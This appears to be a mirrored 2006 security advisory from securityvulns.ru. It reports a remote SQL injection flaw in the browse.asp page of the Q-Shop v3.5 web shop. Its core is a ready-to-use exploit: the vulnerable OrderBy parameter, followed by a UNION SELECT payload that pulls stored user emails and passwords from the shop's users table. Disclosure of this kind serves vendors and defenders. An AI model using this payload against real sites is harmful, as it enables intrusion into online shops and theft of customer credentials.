Security Advisory: Q-Shop v3.5(browse.asp) Remote SQL Injection Vulnerability

[EN] securityvulns.ru
no-pyccku

Related information
  Daily web applications security vulnerabilities summary (PHP, ASP, JSP, CGI, Perl)
  BizDirectory all version xss
  PhotoPost PHP 4.6 - 4.5 [PP_PATH] >> Remote File Include Vulnerability
  Sql injection in Moodle
  MyBB 1.2 Full path and Cross site scripting vulnerabilities

From: ajannhwt_(at)_hotmail.com <ajannhwt_(at)_hotmail.com>
Date: 19.09.2006
Subject: Q-Shop v3.5(browse.asp) Remote SQL Injection Vulnerability

Vulnerability Report
*******************************************************************************
# Title : Q-Shop v3.5(browse.asp) Remote SQL Injection Vulnerability

# Author :   ajann

# Script Page : http://quadcomm.com

# Exploit;

*******************************************************************************

###http://[target]/[path]/browse.asp?cat=42&ManuID=&OrderBy=[SQL HERE]

Example: browse.asp?cat=42&ManuID=&OrderBy=1%20union%20select%200,
mail,0,pwd,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,
0%20from%20users

# ajann,Turkey!Muslim
# ...

test server